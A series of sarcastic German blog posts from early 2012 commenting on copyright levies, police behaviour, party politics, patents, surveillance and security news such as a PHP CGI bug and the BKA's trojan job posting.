Ich halte das für eine der zentralen Fragen unserer Zeit. Wenn ich ein Gerät kaufe, dann muss ich das Recht haben, damit zu tun was ich will, inklusive Reverse Engineering der Software darauf, inklusive "Schutzmaßnahmen" umgehen, inklusive weiterverkaufen, inklusive eigene Software drauf installieren. Das muss m.E. die zentrale Forderung jeder zukunftsorientierten Partei sein, dass es bei Politik um Menschen und nicht um Firmen geht, und die Rechte der Menschen immer schwerer wiegen als die Wünsche von Firmen. Keine Firma darf ihren Kunden vorschreiben, dass ihr Telefon nur in Mobilnetz A geht, dass auf ihrer Spielekonsole nur Spiele und kein Linux laufen darf, dass in ihren Drucker nur Patronen der eigenen Abzockmarke funktionieren. Allgemein: dass Geräte nur für den vom Hersteller/Verkäufer vorgesehenen Zweck verwendet werden dürfen.
Diese ganze Gängelscheiße gehört illegal gemacht. Ja, da werden Geschäftsmodelle implodieren, aber die gehören auch entsorgt, diese Geschäftsmodelle. Firmen müssen sich wieder darauf konzentrieren, Produkte zu bauen, die ihre Kunden haben wollen. Nicht ihre Kunden mit Tricks zum Kauf ihrer Produkte zu gängeln. Die Legacyparteien sind ja offensichtlich alle nicht in der Lage zu dieser trivialen Einsicht. Wie sieht es mit den Piraten aus? Die scheinen mir in der Sicht auch unter Legacy-Partei zu laufen, oder habe ich da was übersehen?

Fri May 4 2012

[l] Bug des Tages: PHP im CGI-Modus übergibt Argumente aus der URL auf der Command Line. Wer sich jetzt denkt, hey, wer betreibt schon PHP im CGI-Modus, so blöde kann doch keiner sein… auf unsere Freunde von Sony ist Verlass [ich hab mal das ?-s am Ende weggemacht] (Sicherheitskopie) (Danke, Michael)

Tue May 1 2012

[l] Der Nachwuchs reagiert auf die ganzen Internetabhörgesetze mit Anschaffung von VPN-Zugängen. Und so hat am Ende jede Generation etwas, das sie so richtig nachhaltig, sehenden Auges, absichtlich und nachhaltig kaputtgemacht hat.
Die direkt nach dem Krieg hatten nicht viel, das sie kaputt machen konnten, aber haben Nazis in der Justiz und der Polizei geduldet. Die danach haben sich ihren Wohlstand auf Pump "gekauft", alle danach haben das weitergeführt und sich über den exponentiellen Schuldenwachstum gewundert.
Die in den 70ies haben sich von den Terroristen beeindrucken lassen, und sich dann selber mit Rasterfahndung und Lauschangriff terrorisiert.
Die in den 80ies haben … mhh da fällt mir gerade nichts ein. Haben die auch was kaputtgemacht? An AIDS und der daraus folgenden Angst vor Sex kann man denen ja schwerlich die Schuld geben. Vielleicht die synthetischen Drogen? Oh ich weiß: die Hoffnung. Die 80ies haben die Hoffnung und den Optimismus kaputtgemacht.
Die 90ies ist das Jahrzehnt der Spekulationsblasen, und die 2000er Jahre sind das Jahrzehnt der Bankster. Und jetzt machen wir uns das Internet kaputt. Keiner will es wirklich, alle wissen genau, dass das gerade passiert, und keiner hält es auf.
Und so sind wir am Ende genau so eine Generation von Arschlöchern wie die Generationen vor uns.
[l] Doktordomino: Der CDU-Fraktionsvorsitzende im Berliner Abgeordnetenhaus, Florian Graf, gibt eine "Täuschungshandlung" beim Verfassen seiner Doktorarbeit zu.
Damit ist so gut wie sicher, dass ihm der Doktortitel aberkannt wird. Lustigerweise behauptet er, seine Doktorarbeit sei nicht öffentlich zugänglich gewesen. Nanu? Wie hat er das denn gemacht, einen Doktortitel zu kriegen, ohne seine Arbeit zu veröffentlichen? Und wie haben die Plagiatssucher dann das Plagiat gefunden, wenn die Arbeit nicht öffentlich zugänglich war? Bizarr. (via)
Update: Ah, die taz hat mehr.
Gleichzeitig vereinbarte Graf eine Sperrfrist für die Arbeit, um diese als Beitrag in dem Fachmagazin "Zeitschrift für Parlamentsfragen" zu veröffentlichen. Die Universität Potsdam teilte mit, dass zum Ablaufen der Sperrfrist am Monatsende "Zweifel an der wissenschafltichen Qualität der Dissertation" aufgekommen seien und die Arbeit einer erneuten Prüfung unterzogen wurde.

Wed Apr 25 2012

[l] Ich habe mich eine Weile gefragt, was sich eigentlich die Leute in 70ies gedacht haben, als sie mit den Plattformschuhen rumliefen, und mit den Schlaghosen. Und die Leute in den 80ies mit den Hair-Band-Frisuren. Oder die Leute in den 90ies mit den Pluderhosen ala MC Hammer. Oder die Leute in den 2000ern mit den gürtellosen Schlabberhosen, die ihnen in den Knien hängen. Das sind alles so Trends, bei denen die Leute dann später auch nicht erklären können, wieso sie bei diesem Scheiß mitgemacht haben. Niemand kann bei irgendeinem dieser Trends sagen, ihm sei nicht klar gewesen, dass sie nicht gemerkt hätten, dass sie wie Clowns aussehen.
Gut, in den 70ies gab es wenigstens noch Drogen als Ausrede.
Und dann dachte ich mir: hey, es gibt wieder so einen Trend. Alle möglichen IQ-Benachteiligten machen mit. Keiner kann behaupten, ihm sei nicht klar gewesen, dass er sich weltöffentlich zum Vollidioten macht. Wovon ich rede? Na von Pony-Avataren natürlich.
Das muss so eine kollektive Gruppengeschichte sein. Der IQ einer Gruppe ist ja bekanntlich der IQ des dämlichsten Teilnehmers geteilt durch die Anzahl der Teilnehmer.
Update: Jaja, Friendship is Magic, herumflauschen, und dann ne Syn Flood. Wenn ich den Depp erwische, der den Kernel ohne Syncookie-Support kompiliert hat, der wird sofort gefeuert!1!!

Wed Apr 18 2012

[l] Julian Assange startet seine Talkshow auf Russia Today mit einem Kracher: mit einem Interview mit dem Hisbollah-Chef Nasrallah, der seit 2006 kein Interview mehr gegeben hatte. Und (stilistisch ganz wunderbar, wenn ihr mich fragt) er hat sich auch gleich den Spaß gemacht, das Presse-Gezeter vorwegzunehmen und lag damit relativ nah an der tatsächlichen Reaktion.

Mon Apr 16 2012

[l] Clubs und Diskotheken sollen bis zu 1000% mehr Geld zahlen. Da werden diverse Einrichtungen schließen müssen. Das fällt sogar den Betonbürokraten der GEMA auf, dass das ungerecht und möglicherweise unpopulär ist, und daher … starten sie eine Image-Kampagne. Und um zu demonstrieren, wie einsichtig und vernünftig sie sind, kommen Aussagen wie
Wer künftig 500 Prozent mehr abführe, habe in der Vergangenheit eben auch „500 Prozent zu wenig bezahlt“, sagte Hempel.

Wed Apr 11 2012

[l] In den USA gibt es jetzt ein Antitrust-Verfahren gegen Apple und diverse Verlage, u.a. auch Holtzbrinck. Der Vorwurf ist, dass die Preisabsprachen getroffen haben, weil Amazon die Margen so klein gemacht hatte, dass sie für Apple den ganzen Markt unattraktiv gemacht haben, und die Verlage waren auch unzufrieden.
4. The Defendants' conspiracy to limit e-book price competition came together as the Publisher Defendants were jointly devising schemes to limit Amazon's ability to discount ebooks and Defendant Apple was preparing to launch its electronic tablet, the iPad, and considering whether it should sell e-books that could be read on the new device. Apple had long believed it would be able to "trounce Amazon by opening up [its] own ebook store," but the intense price competition that prevailed among e-book retailers in late 2009 had driven the retail price of popular e-books to $9.99 and had reduced retailer margins on e-books to levels that Apple found unattractive. As a result of discussions with the Publisher Defendants, Apple learned that the Publisher Defendants shared a common objective with Apple to limit e-book retail price competition, and that the Publisher Defendants also desired to have popular e-book retail prices stabilize at levels significantly higher than $9.99. Together, Apple and the Publisher Defendants reached an agreement whereby retail price competition would cease (which all the conspirators desired), retail e-book prices would increase significantly (which the Publisher Defendants desired), and Apple would be guaranteed a 30 percent "commission" on each e-book it sold (which Apple desired).
Business as usual! (Danke, Sandro)
[l] Ein Nachschlag noch zu den Überlegungen mit den Piraten vorhin. Die Strategie der CDU geht voll auf. Aus Sicht der CDU ist das gerade perfekt. Die Piraten als unscharfe jugendliche Bedrohung treibt die Alten in die Arme der CDU, und die Zuwächse der Piraten kommen zum Gutteil von den Linken, den Grünen und zu einem kleineren Teil der SPD. Im Allgemeinen sind die SPDler zu verkrustet, um direkt zu den Piraten zu gehen, aber viele von denen sind zu den Linken gegangen und von dort aus sind die Piraten relativ nahe.
Bei den Linken muss es gerade eine große Panik geben, wenn die nicht völlig erblindet sind. Die haben immer Menschenrechte und soziale Gerechtigkeit versprochen, und dann haben sie so wenig hingekriegt, dass soziale Gerechtigkeit jetzt der Nummer-1-Wahlgrund für die Piraten ist. Die Linken haben aus meiner Sicht abgewirtschaftet, die hatten ihre Chance, waren in Berlin an der Regierung, hatten da auch echt viele Stimmen hinter sich, und haben dann weitergemacht als wären sie noch in der Opposition. Akzente setzen, coole Aktionen machen, mal ab und zu was Gutes tun? Fehlanzeige. Die Linken hatten ihre Chance und haben sie verkackt.
U.a. weil die CDU das gefahren hat, was die SPD jetzt mit den Piraten macht: Empörung, "mit euch spielen wir nicht", und damit den SPD-Wählern gezeigt: wenn ihr uns wirklich ärgern wollt, müsst ihr die Linken wählen, nicht die SPD, woraufhin eine entsprechende Wählerwanderung einsetzte. Der Bundes-CDU hat das die Mehrheit gesichert, und die SPD wählt lieber die große Koalition als sich mit Grünen und Linken herumzuschlagen.
Die Grünen haben glaube ich noch nicht verstanden, wie schlimm ihre Lage ist. Die haben den ersten Angriffskrieg der Bundesrepublik zu verantworten, die Verelendung der Massen durch Hartz IV, der Atomausstieg fand eher gegen sie als durch sie statt, und die Öko-Agenda hat sich jetzt in ausreichendem Umfang auch die CDU ins Programm geschrieben, dass niemand mehr die Grünen braucht. Den Armen ist außerdem langsam klar geworden, dass die Grünen noch nie auf ihrer Seite standen. Die Grünen sind m.E. so gut wie tot, sie wissen es nur noch nicht. Deutschland hat schon CDU, die brauchen nicht noch eine Partei der besserverdienenden Snobs, die den anderen ihre Grundsätze aufdrängen wollen. Das hat ja auch schon die FDP lernen müssen. Im Übrigen haben die Grünen ja mit Hartz IV selber dafür gesorgt, dass sich die untere Mittelschicht keinen Öko-Krams mehr leisten kann und damit als Wähler ausfällt.
Woran erkennt ihr, ob die CDU diesen Plot fährt oder nicht? Wenn die CDU das so macht wie ich hier sage, dann werden sie jetzt maximal schädliche Netz- und Sicherheitspolitik fahren. Urheberrechte verlängern statt verkürzen, Patentharmonisierung mit USA, Kommentarhaftung für Webseitenbetreiber, Deep Packet Inspection überall, mehr Überwachung, mehr Polizei. Je mehr sinnlose Law&Order-Forderungen, desto besser. Dafür haben Linke und Grüne keine glaubwürdige Gegenstrategie, weil die den Scheiß ja schon mitgetragen haben früher, und das treibt mehr Wähler den Piraten zu, die ja aus Sicht der CDU keine ernsthafte Gefahr sind.

Wed Apr 4 2012

[l] Das BKA sucht einen technischen Leiter für ihre Trojanerentwicklung. Als erstes fällt auf, dass die zu inkompetent waren, den MIME-Type richtig zu setzen. Aber auch der zweite und dritte Eindruck sind bemerkenswert, denn da steht als Titel:
Technische Unterstützung bei der Bekämpfung der Computer-Kriminalität
Man sieht also recht deutlich, dass das BKA mal wieder nicht gewillt ist, sich an das geltende Recht zu halten. Sie wollen Trojaner nicht nur gegen Terroristen und Mörder einsetzen, sondern gegen ganz normale "Computer-Kriminalität".
Das Klugscheißen der üblichen Verdächtigen hat übrigens funktioniert. Dem BKA ist aufgefallen, dass es noch andere Betriebssysteme als Windows gibt, und die möchten sie jetzt auch trojanisieren. Habt ihr ja toll gemacht, liebe Klugscheißer.
Ein Highlight jagt das Nächste in der Ausschreibung. So fordern sie
Fundierte Kenntnisse von Netzwerktechnologien, -topologien und -protokollen (vor allem im Internet verwendete Protokolle)
Äh, … Kenntnisse von Topologien? Wie meinen?
Erfahrung in der Planung und Leitung von Softwareprojekten
Das war ja auch höchste Zeit, dass die sich für ihre Rohrkrepiererprojekte zumindest mal einen fähigen Projektmanager einstellen.
Gute Kenntnisse im Bereich der Sicherheit von Computer-Netzwerken (Netzwerksicherheit)
Bisschen spät, nicht?
Kenntnisse in der Programmierung sicherer Software
Bisschen sehr spät, nicht?
Aber bei all den bedrückenden Details gibt es auch einen Hoffnungsschimmer. Ein klares Indiz, dass auch die nächsten Trojanergenerationen ein Totaler Megareinfall werden, dass da in den nächsten Jahrzehnten nicht mit funktionsfähigen Trojanern zu rechnen ist:
Gute Kenntnisse von Software-Modellierungsstandards und Tool-Umgebungen (z.B. UML)
BWAHAHAHAHA, SIE HABEN UML GESAGT! HAHAHAHAHAHAHA

Thu Mar 29 2012

[l] Ermittlungsverfahren gegen Polizisten eingestellt. Er hatte auf einen am Boden liegenden psychisch kranken Mann eingeschlagen. Ein Passant hatte die Sache mit seinem Handy gefilmt. Selbstverständlich wurde die Sache eingestellt, es handelt sich schließlich um einen Polizisten. Begründung (Achtung, festhalten!): er wehrte sich, als sie ihm Handschellen anlegen wollten.
Daraufhin habe der Polizist von der antrainierten Methode Gebrauch gemacht, mit bestimmten Schlägen die Muskulatur zu lockern und so den Widerstand zu überwinden. Ein rechtsmedizinisches Gutachten bescheinige, dass diese Schläge nicht heftig gewesen seien.
Seht ihr? Das war im Wesentlichen nur eine kleine Massage!1!!

Wed Mar 28 2012

[l] Wenn die GEMA Nazis abmahnt, kann es nur Gewinner geben. (Danke, Michael)
[l] Die Japaner haben bei der CCTV-Gesichererkennung Fortschritte gemacht. Und darüber informiert man sich natürlich am besten bei den Briten, wo sonst.

Thu Mar 22 2012

[l] Apple will sich die Stimmmehrheit bei ETSI zusammentricksen und damit ihren proprietären Scheiß als Standards durchdrücken. Die wären dann auch für die Konkurrenz verfügbar. Gegen angemessene Lizenzzahlungen, versteht sich. Und die Konkurrenz, die das jahrelang so gemacht hat, ist gerade erschüttert — ERSCHÜTTERT!!1! --, dass jemand das umgekehrt mit ihnen machen könnte. JETZT fällt denen plötzlich auf, dass das mit den Patenten und "im-stillen-Kämmerlein-Standards" zum Konkurrenzkleinhalten vielleicht doch keine so tolle Idee war. Diese ganze Branche hat einmal komplett den Untergang verdient.

Wed Mar 21 2012

[l] Womit bezahlt die GEMA eigentlich ihre Kampagne gegen das Internet?
Mit den 36 Euro, die sie als Preis auf jedes Smartphone aufschlagen lassen.

Mon Mar 19 2012

[l] Die "Congestion Charge"-Daten aus London werden jetzt in Indien verarbeitet. Begründung: IBM fand, dass sie nicht genug Profit machen, wenn das in England verarbeitet wird. Und warum haben sie nicht genug Profit gemacht? Deshalb:
The prohibition was rescinded after IBM, which runs the congestion charge zone for Transport for London (TfL), lobbied for a change. The company has been repeatedly fined since it took over the contract from Capita in 2009, making the £60m deal less profitable than it had hoped.
Weil sie so übel verkackt haben, dass sie dauernd Strafen zahlen mussten. Na DAS wird bestimmt VIEL besser, wenn das nach Indien outgesourced wird!1!!

Fri Mar 16 2012

[l] Bürger dürfen die Polizei bei der Arbeit beobachten. Es geht um einen Mann, der bei einer Gegendemo gegen einen Naziaufmarsch den Polizeikessel beobachtet hat. Das hat die Polizei gestört und sie haben ihn drangsaliert.
Diese haben den Betriebswirt kurz vor Ende des Kessels untergefasst, ihn sowohl von vorne als auch von hinten über eine Minute per Video „abgefilmt“, oder „videografiert“, wie die Polizei es nannte. Dabei war dem Kläger der Personalausweis vor die Brust gehalten worden, angeblich um ihm eine länger dauernde schriftliche Aufnahme seiner Personalien zu „ersparen“.
Außerdem haben sie ihm noch einen Platzverweis erteilt und eine Verhaftung angedroht, wenn er sich nicht innerhalb von 15 Minuten entfernt hat. Das hat der Mann nicht gemacht und stattdessen angefangen, die Bürokratie gegen die Polizei in Stellung zu bringen. Erst hat er erreicht, dass die Daten über ihn gelöscht werden, dass der Datenschutzbeauftragte das prüft und bestätigt, und dass das Verwaltungsgericht Freiburg jetzt alle polizeilichen Maßnahmen gegen ihn für unrechtmäßig erklärt hat. Die Polizei hatte diese peinliche Ohrfeige noch durch ein Schuldeingeständnis zu vermeiden versucht, aber das Gericht hat sie damit nicht durchkommen lassen und das amtlich gemacht jetzt.
Der Kläge wurde übrigens durch die Humanistische Union unterstützt. Gut, dass es die gibt. (Danke, Walter)

Wed Mar 14 2012

[l] Wir hatten schon einen schönen Lacher des Tages, sonst wäre es der hier gewesen: Erik Spiekermann ist irritiert, dass die Charité Comic Sans einsetzt.
Falls den jemand nicht kennt: das ist einer der bekanntesten Font-Designer der Welt. Der hat u.a. den berühmten Font "Meta" gemacht und auch Officina (das ist der Font, den ich immer in meinen Folien einsetze). Wikpedia zu ihm.
Update: Jetzt kommt hier ne Mail von der Charité rein, dass das Haus ja gar nicht zur Charité gehört. Stimmt, aber dann funktioniert der implizierte Witz ja nicht mehr, dass er wegen der Font im Krankheitsfalle lieber woandershin gehen würde :-)

Tue Mar 13 2012

[l] Die Piraten haben Meinhard Starostik zum Berliner Verfassungsrichter gemacht. Wer den Namen gerade nicht zuordnen kann: der hat u.a. gegen die Volkszählung geklagt, gegen ELENA und gegen die Vorratsdatenspeicherung.
Das war letzten Donnerstag. Hat das jemand von euch mitgekriegt? Ich wollte eigentlich warten, bis die PR-Kampagne der Piraten anfängt, aber die wurde offensichtlich abgesagt. Oder war nie geplant.
[l] Die Indische Regierung hat erstmals von ihrem Sonderrecht Gebrauch gemacht, lebensrettende Medikamente ohne Rücksicht auf Patentschutz nachbauen zu lassen. Es geht um ein Krebs-Medikament von Bayer namens Nexavar. Und bevor jemand zuviel Mitleid mit Bayer hat: der Nachbau kostet nur 3% des Preises, den Bayer verlangt. Und falls jetzt wieder ein minderbemittelter FDP-Wähler (jaja, ein Pleonasmus, ich weiß) anfängt, mit den Forschungskosten zu argumentieren: Pharmafirmen geben doppelt so viel für Werbung aus, wie sie für Forschung ausgeben. Oh und für die "aber das ist Enteignung!1!!"-Fraktion:
The approval paves the way for the launch of Natco's drug in the market, a company official told TOI, adding that it will pay a 6% royalty on net sales every quarter to Bayer. The licence will be valid till such time the drug's patent is valid, i.e. 2020. As per the CL (compulsory licence) order, Natco is also committed to donating free supplies of the medicines to 600 patients each year.
Wieso macht Deutschland sowas eigentlich nicht?
Oh und noch ein Detail:
The patent office acted on the basis that not only had Bayer failed to price the drug at a level that made it accessible and affordable, it also was unable to ensure that the medicine was available in sufficient quantities within India.
Da fehlt mir echt jede Grundlage für Mitleid.
[l] Rauchverbote bringen doch was. Die Krankenkassen haben dazu eine große Studie gemacht.
Schon ein Jahr nach der Einführung der Nichtraucherschutzgesetze 2007 und 2008 gingen die Klinik-Behandlungen wegen Herzinfarkten um 8,6 Prozent zurück, wie aus Studie hervorgeht. Die federführend vom Kieler Institut für Therapie- und Gesundheitsforschung erarbeitete Studie basiert auf den Daten von 3,7 Millionen DAK-Versicherten.

Fri Mar 9 2012

[l] Die Anklage im Lulzsec-Fall ist draußen und aus ihr geht hervor, dass das FBI Tor-Experten am Start hatte. Gut, was die dann tatsächlich gemacht zu haben zugeben ist eher unterwältigend, z.B. Seite 31:
An FBI TOR network expert analyzed the data from the Pen/Trap and was able to determine that a significant portion of the traffic from the CHICAGO RESIDENCE to the Internet was TOR-related traffic.
Gut, die können jetzt keine große Trafficanalyse einräumen, das ist wie Israel mit den Atomwaffen, aber alleine dass sie Tor-Experten haben, das lässt ja schon mal tief blicken.

Tue Mar 6 2012

[l] Der Tweet des Tages:
Romney, Santorum, Gingrich now confirmed to speak to Policy conference Tuesday morning March 6
Der Tweet kommt von AIPAC, das ist die größte Pro-Israel-Lobbyvereinigung in den USA. Romney, Santorum und Gingrich sind die drei führenden Kandidaten der Republikaner. Und die sprechen alle bei AIPAC. Da weiß man, wo es hingeht.
Update: Oh und falls jemand denkt, der Obama sei da anders: Der war schon dort und hat Iran-Säbelrasseln gemacht.

Mon Mar 5 2012

[l] Wisst ihr, wer gerade gehackt wurde? Kommt ihr NIE drauf! Zwei Hacker tragen Michael Jacksons Musikkatalog bei Sony Music raus, inklusive unveröffentlichtes Material. Den hatte Sony Music erst 2010 für 250 Millionen US-Dollar gekauft.
Update: Jaja, der Hack war vor längerer Zeit, sie haben es nur jetzt zugegeben. Das hätte mir aber meinen schönen running gag kaputtgemacht :)
[l] Der eine Fall mit dem "rück das Passwort raus, sonst gibt's Ärger!1!!" hat sich gerade geklärt. Genau wie man sich das in schlechten Fernsehserien vorstellt, hat die Polizei dann halt Druck auf den Ex-Ehemann gemacht, dass sie die Frau einknasten und wer kümmert sich denn dann um die Kinder!1!! und so weiter, und da hat der Mann ihnen eine Liste mit denkbaren Passwörtern gegeben und eines davon war das Richtige. Das ist doch mal ein Rechtsstaat, von dem unsere Cops noch was lernen können! In den USA verprügelt man nicht einfach wahllos Menschen, nein, so eine Nummer richtet doch viel langfristigere Schäden an. Die Frau können sie jetzt verfolgen, wo sie ihre Dateien entschlüsseln können, oder wenn nicht dann haben sie sie trotzdem einmal nackig gemacht vor der Öffentlichkeit, die Frau und der Mann wissen jetzt, dass er sie ans Messer geliefert hat, da wird auch nie wieder was anderes als verbrannte Erde herrschen, und die Kinder sind das größte Opfer der ganzen Geschichte. Dass solche "Strafverfolger" nachts überhaupt schlafen können…
[l] Hurra, Putin hat gewonnen! Also DAMIT konnte ja wohl NIEMAND rechnen!1!!
Ich weiß gar nicht, wieso die sich die Mühe mit dem Auszählen gemacht haben. Oh, ich höre gerade, haben sie auch gar nicht :-)

Sat Mar 3 2012

[l] Ich hatte Anfang der Woche diesen Mitschnitt aus einem Internetzensurmgremium bei der EU-Kommission verlinkt und hatte gehofft, dass daraus jemand ein Best-Of-Youtube-Video macht. Das hat leider nicht stattgefunden, aber Peter Piksa hat mal in Textform ein Best-Of gemacht. Wer noch nicht dazu gekommen ist, sich die 2 Stunden Audio anzuhören, dem sei das ausdrücklich ans Herz gelegt. Es ist euer Internet, das die da zensieren wollen, kümmert euch gefälligst!

Tue Feb 28 2012

[l] Lacher des Tages: ein Kumpel im Chat meckert gerade, dass er einen C-Code von wo kopiert hat, und auf seinem Zielsystem gibt es gar kein netinet.h. Gibt es ja auch nicht, das heißt netinet/in.h. Ich guck mir also die Quelle an und stelle fest: Da steht auch netinet/in.h.
Die Lösung war, dass der Kumpel in seinem Browser ein Binnen-I-Entfernplugin installiert hat, und der hat aus netinet/in.h flugs ein netinet.h gemacht.
Der Kumpel verteidigt sich damit, dass er Indymedia lesen wollte, ohne "Hornhautablösung" zu erleiden.
Money Quote:
so weit hat uns der feminismus schon getrieben, dass die exploits nicht mehr compilen!
*schenkelklopf*
Update: Falls jemand nicht weiß, was ein Binnen-I-Entfernplugin ist: sowas hier. In diesem konkreten Fall war es wohl der Safari-Port davon, "Binnen-X".
Update: Hahaha jetzt kommt ein anderer Kumpel und meint, er versteht den Blogeintrag nicht, weil da steht "hat aus netinet.h flugs ein netinet.h gemacht" — der hatte auch ein Binnen-I-Plugin installiert. Vielleicht sollte ich ein Inline-Bild nehmen. Ich hab mal das / escaped, hoffentlich überlebt das jetzt eure Plugins. Zitat:
ich bin seitdem deutlich ausgeglichener und lese auch texte die ich sonst wegklicke nach dem ersten rumgegendere.
Soll noch mal jemand sagen, mit Technologie könne man keine sozialen Probleme lösen!

Thu Feb 23 2012

[l] Aus der beliebten Kategorie "wenn DIE sich kloppen, kann es nur Gewinner geben": Sony Music ist sauer mit Youtube, weil sie ihre Musik GEMA-filtern. Komisch, andere Leute, die Musikvideos von Sony Music im Internet anbieten, kriegen Abmahnungen und Drohungen, Youtube kriegt Drohungen, wenn sie sie nicht ins Internet stellen.

Tue Feb 21 2012

[l] Ein Informant hat mir gerade den wahren Grund für die Gauck-Nominierung gemailt :-) (Danke, Piotr)

Mon Feb 20 2012

[l] Als die Staatsanwaltschaft kino.to zugemacht hat, haben sie stattdessen eine "diese Domain wurde beschlagnahmt"-Seite hingetan. Auf der waren heute Amazon-Affiliate-Links zu sehen. Die Staatsanwaltschaft war es nicht.
Die BESTEN der BESTEN der BESTEN, SIR!
Nicht mal eine statische "diese Domain ist beschlagnahmt"-Seite kriegen diese Spezialexperten hin!

Sun Feb 19 2012

[l] Weil sich jetzt gerade der Gauck durchzusetzen scheint, sei nochmal auf seine Position zum Sarrazin-Buch hingewiesen, und die zur Vorratsdatenspeicherung. Hier hat jemand ein Bild daraus gemacht, mit einem schönen Zitat aus diesem Artikel aus dem Standard. Das Zitat erinnerte mich ein bisschen an diese geistige Glanzleistung der CDU. Kein Wunder also, dass der Gauck von der CDU keine Gegenwehr zu erwarten hat. Die entscheiden sich ja auch sonst immer für die falsche Option.
Update: Die Atlantikbrücke und die Springer-Connection seien auch noch mal explizit erwähnt.

Fri Feb 17 2012

[l] Es gibt mal wieder einen klaren Fall von Notwehr. Dieses "schaut mal alle her, jetzt hab ich auch mal jemanden plattgemacht"-Grinsen am Ende ist ein Sahnehäubchen. (Kontext)
[l] In Kanada gibt es gerade einen lustige Leak-Skandal. Es geht um den "public safety minister" Vic Toews, der da einen auf Law&Order gemacht hat und ein gruseliges Schnüffelgesetz vorgeschlagen hat und auch ansonsten ein Hardliner ist, z.B. wenn es um die gleichgeschlechtliche Partnerschaften geht.
Dann tauchte plötzlich ein Twitter-Account auf und verteilt seit dem unappetitliche Details über sein Privatleben. So lebt er angeblich gerade mit seiner Geliebten, mit der er seine Frau betrogen hat, und ihrem gemeinsamen Kind, und soll auch keine Alimente mehr zahlen. Kurz: eine Schlammschlacht.

Tue Feb 14 2012

[l] Die S-21 "Hassbürger" sehen sich zusehender Polizei-Repressalien ausgesetzt.
Heute früh wurde ein Demonstrant erkennungsdienstlich behandelt wegen ‚schwerer Körperverletzung mittels einer Wasserpistole‘
Das ist ja an sich schon ein Schenkelklopfer, aber guckt mal, was der damit gemacht hat!
Er hatte mit einer Wasserpistole die Tür des Abrissbaggers am Südflügel vereist. Der angeblich schwer körperverletzte Angestellte einer Sicherheitsfirma wurde noch nicht einmal nass gemacht: Er stand ca. 4 Meter vom Bagger entfernt und war durch den drei Meter hohen Bauzaun von den wasserspritzenden Parkschützern getrennt.
Völlig klar, Massenvernichtungs-Wasserpistolen sind eine so schwerwiegende Bedrohung, dass schon ihre bloße Anwesenheit in der Nähe anderer Menschen eine schwere Körperverletzung darstellt!1!!
Update: Polizei stellt Benzinkanister in Parkschützer-Garage sicher. Das ist ja schon WTF genug, aber per Mail kommt hier gerade das Detail rein, dass die Parkschützer das Benzin für die Generatoren der Demo-Sanitäter angeschafft haben. Das wurde angeschafft, als am 30.9. keine Rettungsfahrzeuge in den Park reinfahren durften. (Danke, Axel)

Mon Feb 13 2012

[l] Youtube sperrt "versehentlich" ACTA-Protestvideo unter Creative Commons, schiebt es in der Fehlermeldung der GEMA in die Schuhe. (Danke, Adrian)

Wed Feb 8 2012

[l] Trafficanalyse ist eine Sache, die immer wieder gerne von Datenschützern hochgehalten wird, aber die den meisten Leuten zu obskur erscheint, als dass man sich davon wirklich bedroht fühlen müsste. Und wenn, dann machen das fiese Regierungen, nicht der Typ da hinten in der Ecke im Cafe mit seinem Notebook. Hier hat mal ein Kumpel von mir eine schöne Demo gemacht. Bei ihm ist das ein Labor-Setup, aber dieser Angriff geht genau so, wenn man mit seinem Laptop im Cafe sitzt.
Es geht bei der Demo darum, dass das Opfer bei Google Maps rumklickt — über SSL. Aber dass man, wenn man gut vorbereitet ist, aus der Größe der gezogenen Kacheln sehen kann, wo auf der Welt der gerade herumklickt.
Falls ihr also mal jemandem erklären wollt, wie schlimm das mit dem Datenschutz im Internet wirklich ist (und wieso ich immer mein Laptop per Kabel anschließe und nicht per Wifi), dann ist dieser Blogpost vielleicht ein guter Ansatz.

Mon Feb 6 2012

[l] Der CCC hatte am Wochenende eine außerordentliche Mitgliederversammlung, bei der es darum ging, ob der Ausschluss von Daniel Domscheit-Berg korrekt war oder nicht. Die Sache ist ein bisschen diffiziler als es auf den ersten Blick aussieht.
Auf der einen Seite besteht große Einigkeit darüber, dass die Art und Weise dieses Rausschmisses völlig unakzeptabel war. Das war ein Fehler, zu Fehlern muss man stehen und sie korrigieren. Insofern war weitgehend klar, dass Daniels Rausschmiss zurückgenommen wird.
Auf der anderen Seite sind die Vorwürfe, die zu dem Rausschmiss geführt haben, ja inhaltlich schon partiell begründet gewesen, und Daniel zeigte sich aus Sicht Vieler nicht ausreichend kritikfähig. Ich bin froh, dass der CCC sich dennoch durchringen konnte, das so zu handhaben.
Ein Hinweis sei mir noch erlaubt. Im CCC kann jeder Mitglied werden. Man muss kein Hacker sein, es gibt da keine Gesinnungsprüfung, kein Interview, nichts. Man druckt dafür ein PDF aus, füllt es aus, unterschreibt und schickt es ein, und dann überweist man seinen Mitgliedsbeitrag. Das hat Daniel gemacht. Beim CCC könnte theoretisch auch Helmut Kohl Mitglied werden, solange der noch in der Lage ist, ein PDF auszufüllen und seinen Beitrag zu überweisen. Eine charakterliche Bewertung des Beitretenden ist nicht vorgesehen.

Thu Feb 2 2012

[l] Achtung, an Widerlichkeit kaum zu überbieten: CDU und FDP heben Immunität der Chefs der Linkspartei im hessischen Landtag auf. Warum? Weil sie an der Anti-Nazi-Demo in Dresden teilgenommen hatten. Ihr wisst schon, die wo der Staat gegen die Linken Telefon-Rasterfahndung gemacht hat, um die armen Nazi-Opfer zu schützen. Die war nicht angemeldet. Völlig klar also: da muss die Immunität aufgehoben werden. Weil — festhalten —:
Wenn eine Staatsanwaltschaft die Aufhebung beantrage, habe man keine andere Wahl, hieß es aus der Koalition.
Das muss man sich mal auf der Zunge zergehen lassen! Daher hier mein Aufruf an die Staatsanwaltschaften dieses Landes: beantragt bitte umgehend für alle CDU- und FDP-Politiker die Aufhebung der Immunität. Wenn ihr einen Grund braucht, nehmt "Rädelsführerschaft". Das ist der Vorwurf in diesem Fall an die Linken. Rädelsführerschaft!!

Mon Jan 30 2012

[l] Endlich mal eine gute Nachricht: Frankreich führt eine Finanztransaktionssteuer ein. Immer fett ausräuchern, die Zocker. Funktioniert dann am besten, wenn alle mitmachen. Also los, Frau Merkel. Und dann überlegen wir uns, was wir mit England machen, nachdem wir das ganze Bankster-Geschmeiß dorthin weggeekelt haben. Napoleon hat mal ne Seeblockade gemacht, kann man ja nochmal drüber nachdenken :-)

Sat Jan 28 2012

